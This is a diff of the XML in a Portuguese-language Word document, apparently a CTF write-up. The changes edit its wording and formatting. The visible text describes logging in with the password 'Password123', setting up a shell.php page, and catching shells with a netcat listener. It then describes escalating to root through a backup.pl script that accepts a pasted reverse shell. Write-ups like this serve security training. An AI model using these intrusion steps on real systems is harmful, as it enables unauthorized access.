+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> basta</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> acess</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>á-la</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>. (</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -3461,6 +3532,14 @@
           <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>: Password123)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3539,12 +3618,30 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Agora que temos acesso, podemos voltar no arquivo do </w:t>
+        <w:t xml:space="preserve">Agora que temos acesso, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">voltamos </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">no arquivo do </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:i/>
+          <w:iCs/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -3557,7 +3654,23 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve"> e ver que precisamos criar uma página chamado </w:t>
+        <w:t xml:space="preserve"> e </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>verificamos</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> que precisamos criar uma página chamado </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -3575,7 +3688,65 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>. Para fazer isso, acessamos a URL que ele pede, porém, vai dar erro, apenas reinicie o Firefox</w:t>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Para isso, acessamos a URL especificada.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Um erro ocorre no processo</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">para </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>contorna-lo</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>basta reiniciar o Firefox.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3688,6 +3859,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:i/>
+          <w:iCs/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -3810,6 +3983,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:i/>
+          <w:iCs/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -3841,10 +4016,20 @@
         </w:rPr>
         <w:t xml:space="preserve">Caso você não tenha uma, pode baixar no </w:t>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">site </w:t>
+      </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:i/>
+          <w:iCs/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -4068,16 +4253,42 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Podemos então agora </w:t>
+        <w:t>Podemos então agora inic</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ar </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">um </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>inicar</w:t>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>netcat</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -4086,7 +4297,31 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve"> o nosso famoso </w:t>
+        <w:t>, para poder acessar a máquina.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Colocamos </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">o URL, porém ao invés de </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -4095,7 +4330,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>netcat</w:t>
+        <w:t>hacked.php</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -4104,15 +4339,23 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>, para poder acessar a máquina.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> E colocando o URL, porém ao invés de </w:t>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>utilizamos</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> o nome da </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -4121,7 +4364,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>hacked.php</w:t>
+        <w:t>shell.php</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -4130,18 +4373,8 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">, você coloca o nome da </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>shell.php</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>.</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4289,7 +4522,47 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Agora só procurar com uma simples navegação de diretório o user.txt</w:t>
+        <w:t xml:space="preserve">Agora </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>basta</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> procurar com uma simples navegação de diretório o </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">arquivo </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>user.txt</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4372,11 +4645,11 @@
           <w:color w:val="000000"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="2" w:name="_heading=h.2et92p0" w:colFirst="0" w:colLast="0"/>
       <w:bookmarkEnd w:id="2"/>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -4385,90 +4658,9 @@
           <w:color w:val="000000"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>What</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:smallCaps/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:smallCaps/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>is</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:smallCaps/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:smallCaps/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>the</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:smallCaps/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:smallCaps/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>root</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:smallCaps/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> flag?</w:t>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>What is the root flag?</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4518,6 +4710,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:i/>
+          <w:iCs/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -4530,7 +4724,23 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve"> para poder ver que comandos podemos usar.</w:t>
+        <w:t xml:space="preserve"> para poder ver que comandos podemos </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>realizar com permissões elevadas</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4655,7 +4865,15 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Podemos ver que há um arquivo interessante para dar uma olhada, o “backup.pl”</w:t>
+        <w:t>Podemos ver que há um arquivo interessante, o “backup.pl”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4733,7 +4951,31 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Ele nos direciona para outro, podemos dar uma olhada também</w:t>
+        <w:t>Ele nos direciona para outro</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> arquivo</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>, podemos dar uma olhada também</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4812,7 +5054,39 @@
           <w:szCs w:val="24"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">Ele simplesmente nos entrega um lugar para podermos colar uma reverse </w:t>
+        <w:t>Ele simplesmente nos</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> mostra</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> um lugar </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>onde</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> podermos colar uma reverse </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -4836,6 +5110,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:i/>
+          <w:iCs/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -4932,12 +5208,22 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:i/>
+          <w:iCs/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>echo</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5209,6 +5495,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:i/>
+          <w:iCs/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -5221,12 +5509,14 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve"> na nova porta que você abriu, e rodando novamente o comando do </w:t>
+        <w:t xml:space="preserve"> na nova porta que você abriu, e rodando novamente o comando </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:i/>
+          <w:iCs/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -5236,10 +5526,20 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -l conseguimos o root. </w:t>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -l</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> conseguimos o root. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5285,13 +5585,36 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Neste CTF, foi usado desde </w:t>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Neste CTF, fo</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>ram utilizados</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -5315,6 +5638,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:i/>
+          <w:iCs/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -5330,10 +5655,11 @@
         <w:t xml:space="preserve">, busca de diretório, procura por </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:i/>
+          <w:iCs/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -5346,18 +5672,124 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">  até</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> escalação de privilégio, portanto, eu recomendo muito para dar uma leve praticada e aprimorar mais um pouco suas habilidades.</w:t>
-      </w:r>
-    </w:p>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>e</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> escalação de privilégio</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>. Desse modo</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ele é recomendado </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
